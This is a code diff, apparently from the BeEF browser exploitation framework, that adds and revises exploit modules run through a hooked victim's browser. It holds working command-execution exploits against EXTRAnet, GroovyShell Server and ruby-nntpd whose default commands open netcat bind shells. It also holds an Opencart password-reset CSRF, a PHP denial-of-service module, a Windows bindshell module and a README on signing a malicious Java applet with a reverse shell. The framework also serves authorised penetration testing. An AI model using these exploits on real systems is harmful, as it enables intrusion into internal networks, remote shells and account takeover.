                 beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
 
                 //send command
@@ -68,7 +68,7 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             var cmd_result = strip_output(xhr.responseText);
-            console.log(cmd_result);
+            beef.debug(cmd_result);
             beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
         };
         xhr.open("POST", uri, false);

modules/exploits/beefbind/beef_bind_staged_deploy/command.js

@@ -295,7 +295,7 @@ beef.execute(function () {
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
             log("send_stager: stager sent.");
             stager_successfull = true;
         }catch(exception){
-            console.log("!!! Exception: " + exception);
+            beef.debug("!!! Exception: " + exception);
             // Check for PortBanning exceptions:
             //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
             if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
             var uri = "http://" + rhost + ":" + rport + path;
 
             xhr = new XMLHttpRequest();
-            console.log("uri: " + uri);
+            beef.debug("uri: " + uri);
             xhr.open("POST", uri, true);
             xhr.setRequestHeader("Content-Type", "text/plain");
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
 
     log = function(data){
         beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
-        console.log(data);
+        beef.debug(data);
     };
 
 

modules/exploits/extract_cmd_exec/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(extract_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/extract_cmd_exec/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        extract_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+            description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]

modules/exploits/extract_cmd_exec/module.rb

@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '10100'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

modules/exploits/groovyshell_server_cmd_exec/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(groovy_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/groovyshell_server_cmd_exec/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        groovyshell_server_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "GroovyShell Server Command Execution"
+            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]

modules/exploits/groovyshell_server_cmd_exec/module.rb

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Groovyshell_server_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '6789'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

modules/exploits/local_host/java_payload/README.txt

@@ -0,0 +1,50 @@
+--- How to use this module ---
+The following is how you compile the JavaPayload handlers :
+
+$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
+$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
+$cd .. && ant compile && ant jar
+$cd build/bin
+$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
+
+At this point you have the applet ready to go, with a reverseTCP handler:
+Applet_ReverseTCP.jar
+Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
+with Java 6 to run it on those versions too - SUGGESTED :-).
+
+At this stage you need to sign the applet.
+The following is to create a self-signed certificate and then sign it.
+Obviously if you have a valid code signing certificate, even better ;)
+
+keytool -keystore tmp -genkey
+jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
+
+Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
+
+You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
+java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+
+Now launch the BeEF module.
+If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
+antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+! help
+help: show information about commands.
+  Usage: help [command]
+
+Supported commands:
+    help   - show this help
+    info   - list system properties
+    pwd    - show current directory
+    cd     - change directory
+    ls     - list directory
+    exec   - execute native command
+    cat    - show text file
+    wget   - download file
+    telnet - create TCP connection
+    paste  - create text file
+    jobs   - list or continue jobs
+    exit   - Exit JSh
+
+When inside an interactive command, enter ~. on a new
+line to exit from that command. Enter ~& to background the command.
+Enter ~~ to start a line with a ~ character

modules/exploits/local_host/java_payload/config.yaml

@@ -12,5 +12,4 @@ beef:
             description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
             authors: ["antisnatchor"]
             target:
-                not_working: ["FF"]
                 user_notify: ["All"]

modules/exploits/local_host/java_payload/module.rb

@@ -6,7 +6,7 @@
 class Java_payload < BeEF::Core::Command
 
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
   end
 
   def self.options

modules/exploits/opencart_reset_password/command.js

@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base     = '<%= @base %>'; 
+  var password = '<%= @password %>';
+
+  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+    {'type':'hidden', 'name':'password', 'value':password},
+    {'type':'hidden', 'name':'confirm',  'value':password}
+  ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(opencart_reset_password_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/opencart_reset_password/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        opencart_reset_password:
+            enable: true
+            category: "Exploits"
+            name: "Opencart Reset Password CSRF"
+            description: "Attempts to reset an Opencart user's password."
+            authors: ["Saadat Ullah", "bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/opencart_reset_password/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# This module has not been tested
+class Opencart_reset_password < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/php-5.3.9-dos/command.js

@@ -32,7 +32,7 @@ function serializeObj (obj) {
 }
 
 // Run attack
-function attackSite (target_url) {
+function php_dos (target_url) {
     var bad = serializeObj(createEvilObj());
     var xhr = new XMLHttpRequest();
     xhr.open("POST", target_url, true);
@@ -42,10 +42,10 @@ function attackSite (target_url) {
 }
 
 try {
-    attackSite("<%= @url %>");
-    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
+    php_dos("<%= @url %>");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
 } catch (e) {
-    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
 }
 
 });

modules/exploits/php-5.3.9-dos/module.rb

@@ -13,7 +13,8 @@ class Php_dos < BeEF::Core::Command
 
 	def post_execute
 		content = {}
-		content['result'] = @datastore['result']
+		content['result'] = @datastore['result'] if not @datastore['result'].nil?
+		content['fail]    = @datastore['fail']   if not @datastore['fail'].nil?
 		save content
 	end
 

modules/exploits/qnx_qconn_command_execution/command.js

@@ -30,12 +30,12 @@ beef.execute(function() {
 	}
 
 	// send commands
-	var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	// clean up
 	cleanup = function() {
-		document.body.removeChild(qnx_iframe);
+		document.body.removeChild(qnx_iframe_<%= @command_id %>);
 	}
 	setTimeout("cleanup()", timeout*1000);
 

modules/exploits/ruby_nntpd_cmd_exec/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(nntpd_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/ruby_nntpd_cmd_exec/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ruby_nntpd_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "ruby-nntpd Command Execution"
+            description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]

modules/exploits/ruby_nntpd_cmd_exec/module.rb

@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
+###
+class Ruby_nntpd_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '1119'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

modules/ipec/inter_protocol_irc/command.js

@@ -25,12 +25,12 @@ beef.execute(function() {
 	irc_commands    += "PRIVMSG " + channel + " :" + message + "\nQUIT\n";
 
 	// send commands
-	var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, irc_commands);
+	var irc_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent");
 
 	// clean up
 	cleanup = function() {
-		document.body.removeChild(irc_iframe);
+		document.body.removeChild(irc_iframe_<%= @command_id %>);
 	}
 	setTimeout("cleanup()", 15000);
 

modules/ipec/inter_protocol_win_bindshell/command.js

@@ -6,74 +6,41 @@
 
 beef.execute(function() {
 
-	var target_ip = "<%= @ip %>";
-	var target_port = "<%= @port %>";
-	var cmd = "<%= @cmd %>";
-	var timeout = "<%= @command_timeout %>";
-	var internal_counter = 0;
-
-	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
-
-	var iframe = document.createElement("iframe");
-	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
-	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
-	document.body.appendChild(iframe);
-
-	function do_submit(ip, port, content) {
-
-		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
-		var parent = window.location.href;
-
-		myform=document.createElement("form");
-		myform.setAttribute("name","data");
-		myform.setAttribute("method","post");
-		myform.setAttribute("enctype","multipart/form-data");
-		myform.setAttribute("action",action);
-		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
-	
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id",<%= @command_id %>);
-		myExt.setAttribute("name",<%= @command_id %>);
-		myExt.setAttribute("value",content);
-		myform.appendChild(myExt);
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id","endTag");
-		myExt.setAttribute("name","</div>");
-		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
-
-		myform.appendChild(myExt);
-		myform.submit();
+	// validate payload
+	try {
+		var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
 	}
 
-	function waituntilok() {
-
-		try {
-			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
-				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
-				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
-				document.body.removeChild(iframe);
-				return;
-			} else throw("command results haven't been returned yet");
-		} catch (e) {
-			internal_counter++;
-			if (internal_counter > timeout) {
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
-				document.body.removeChild(iframe);
-				return;
-			}
-			setTimeout(function() {waituntilok()},1000);
-		}
+	// validate target host
+	var rhost = "<%= @rhost %>";
+	if (!rhost) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
 	}
 
-	if (!target_port || !target_ip || isNaN(target_port)) {
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
-	} else if (target_port > 65535 || target_port < 0) {
+	// validate target port
+	var rport = "<%= @rport %>";
+	if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
-	} else {
-		do_submit(target_ip, target_port, cmd);
-		waituntilok();
+		return;
 	}
 
+	// validate timeout
+	var timeout = "<%= @timeout %>";
+	if (isNaN(timeout)) timeout = 30;
+
+	// send commands
+	var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit");
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent');
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(win_ipec_form_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout * 1000);
+
 });
 

modules/ipec/inter_protocol_win_bindshell/command.old.js

@@ -0,0 +1,86 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+// This is the old module which supports bi-directional communications for Firefox before version ~16
+beef.execute(function() {
+
+	var target_ip   = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var cmd         = "<%= @cmd %>";
+	var timeout     = "<%= @command_timeout %>";
+	var internal_counter = 0;
+
+	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
+
+	var iframe = document.createElement("iframe");
+	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
+	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+	document.body.appendChild(iframe);
+
+	function do_submit(ip, port, content) {
+
+		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
+		var parent = window.location.href;
+
+		myform=document.createElement("form");
+		myform.setAttribute("name","data");
+		myform.setAttribute("method","post");
+		myform.setAttribute("enctype","multipart/form-data");
+		myform.setAttribute("action",action);
+		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
+	
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id",<%= @command_id %>);
+		myExt.setAttribute("name",<%= @command_id %>);
+		myExt.setAttribute("value",content);
+		myform.appendChild(myExt);
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id","endTag");
+		myExt.setAttribute("name","</div>");
+		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
+
+		myform.appendChild(myExt);
+		myform.submit();
+	}
+
+	function waituntilok() {
+
+		try {
+			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
+				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
+				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
+				document.body.removeChild(iframe);
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+			internal_counter++;
+			if (internal_counter > timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
+				document.body.removeChild(iframe);
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	// validate target host
+	if (!target_ip) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
+	}
+
+	// validate target port
+	if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+		return;
+	}
+
+	// send commands
+	do_submit(target_ip, target_port, cmd);
+	waituntilok();
+
+});
+

modules/ipec/inter_protocol_win_bindshell/config.yaml

@@ -9,8 +9,8 @@ beef:
             enable: true
             category: "IPEC"
             name: "Bindshell (Windows)"
-            description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field. <br><br>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+            description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
             authors: ["bcoles", "wade"]
             target:
-                working: ["FF"]
-                not_working: ["C", "S", "O", "IE"]
+                working: ["FF", "C"]
+                not_working: ["S", "O", "IE"]

modules/ipec/inter_protocol_win_bindshell/module.rb

@@ -4,67 +4,28 @@
 # See the file 'doc/COPYING' for copying permission
 #
 =begin
-[+] Summary:
-
-Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
-
-The command results are returned to the BeEF control panel.
-
-[+] Tested:
-
-o Working:
-	o Mozilla Firefox 4
-	o Mozilla Firefox 5
-
-o Not Working:
-	o Mozilla Firefox 5 with the NoScript extension
-	o Internet Explorer 8+
-	o Chrome 13
-	o Opera 11
-	o Safari 5
-
-[+] Notes:
-
-o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
-
-	o use the netcat persistent listen "-L" option rather than the listen "-l" option; or
-
-	o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
-
-o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
-
-	[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7}
-	SYSTEM rule:
-	Site LOCAL
-	Accept from LOCAL
-	Deny
-
-o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
-
-o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
-
-o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
+The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
+	- use the netcat persistent listen "-L" option rather than the listen "-l" option; or
+	- remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
 
+Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however.
 =end
 
 class Inter_protocol_win_bindshell < BeEF::Core::Command
   
   def self.options
     return [
-	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
-	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
-	{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
